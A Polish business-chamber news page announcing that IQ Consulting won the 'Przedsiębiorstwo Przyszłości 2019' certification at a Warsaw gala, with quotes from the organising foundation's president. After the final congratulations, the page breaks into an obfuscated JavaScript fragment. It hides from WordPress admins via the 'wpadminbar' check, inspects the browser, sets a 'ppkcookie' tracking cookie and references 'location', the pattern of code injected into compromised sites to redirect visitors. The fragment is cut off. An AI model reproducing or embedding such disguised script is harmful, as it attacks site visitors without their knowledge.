Certyfikat Przedsiębiorstwo Przyszłości 2019 dla IQ Consulting | Północna Izba Gospodarcza w Koszalinie

Miło nam poinformować, że Pan Tomasz Bieńkowski reprezentant IQ consulting 24 czerwca 2019 roku w zabytkowych murach Pałacu Lubomirskich w Warszawie otrzymał – Certyfikat Przedsiębiorstwo Przyszłości 2019- jako jedyna firma szkoleniowa w Polsce!

24 czerwca 2019 roku w zabytkowych murach Pałacu Lubomirskich w Warszawie odbyła się Gala Finałowa 6. edycji Ogólnopolskiego Konkursu i Programu Certyfikacji Firm i Innych Jednostek Prowadzących Działalność Gospodarczą „Przedsiębiorstwo Przyszłości”, którego organizatorem merytorycznym jest Fundacja Rozwoju Edukacji i Szkolnictwa Wyższego. Na uroczystość przybyli do stolicy prezesi, dyrektorzy i właściciele reprezentujący firmy z całej Polski, by z rąk Prezes Zarządu Fundacji Grażyny Kaczmarczyk i Przewodniczącego Komisji Konkursowej Dariusza Rotta odebrać Certyfikaty i Statuetki przyznane za nowoczesne zarządzanie, inwestowanie w kapitał ludzki i rozwój wiedzy.

„Przedsiębiorstwo Przyszłości” to Ogólnopolski Program, w którym oferujemy usługę certyfikacji firm cechujących się nowoczesnością, innowacyjnością i nowatorskim podejściem do prowadzenia biznesu. Od 2013 roku prestiżowe certyfikaty „Przedsiębiorstwo Przyszłości” zdobywają corocznie liderzy rynku – firmy, które osiągnęły sukces dlatego, że są otwarte na wiedzę, kreatywne, inwestują w swoich pracowników, rozumieją, jak ważne jest ciągłe podnoszenie kompetencji i nowoczesne zarządzanie kapitałem ludzkim. Program ma charakter otwarty – może do niego przystąpić każda zainteresowana firma. Zdobywców certyfikatu wyłania specjalna Komisja, w której zasiadają profesorowie i doktorzy renomowanych polskich uczelni, m.in. Uniwersytetu Ekonomicznego w Katowicach, Uniwersytetu Śląskiego i Katolickiego Uniwersytetu Lubelskiego.

-Dziś wręczone laury to nagrody dla tych polskich firm, które swoje modele biznesowe opierają na inwestowaniu w kapitał intelektualny, są kreatywne i nastawione na generowanie innowacji, skutecznie i efektywnie zarządzają zasobami ludzkimi, wykazują się elastycznością, posiadają umiejętność wykorzystywania własnego potencjału innowacyjnego dla utrzymania wysokiej pozycji konkurencyjnej, kooperując przy tym z uczelniami albo czerpiąc z dorobku akademickiego  – mówiła do laureatów Grażyna Kaczmarczyk, prezes zarządu Fundacji Rozwoju Edukacji i Szkolnictwa Wyższego.

W tym roku wyróżnienia „Przedsiębiorstwo Przyszłości” wręczono w zabytkowych wnętrzach Pałacu Lubomirskich, w którym mieści się m.in. siedziba Business Centre Club i prestiżowe Centrum Prasowe Lubomirskich.

-Gratuję dotychczasowych osiągnięć, unikatowych pomysłów, nowatorskich modeli biznesowych, innowacyjnych wdrożeń i nietuzinkowego podejścia do zarządzania. Życzę także, by wszystkie rozwiązania, które poddane zostały ocenie w konkursie „Przedsiębiorstwo Przyszłości” udało się Państwu nie tylko utrzymać, ale również twórczo rozwinąć: z korzyścią dla pracowników i klientów – podsumowała Galę Prezes Grażyna Kaczmarczyk.

Zwieńczenie uroczystości stanowił recital wokalny Anny Rygiel oraz bankiet wydany na cześć Laureatów. Tegoroczna Gala Konkursu „Przedsiębiorstwo Przyszłości” połączona była z uroczystością finałową drugiego z programów certyfikacyjnych organizowanych przez Fundację Rozwoju Edukacji i Szkolnictwa Wyższego – Programu „Uczelnia Liderów”, adresowanego do środowisk akademickich.

Serdecznie gratulujemy sukcesów!
Takie wspaniałe firmy są zrzeszone w naszej Izbie! 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m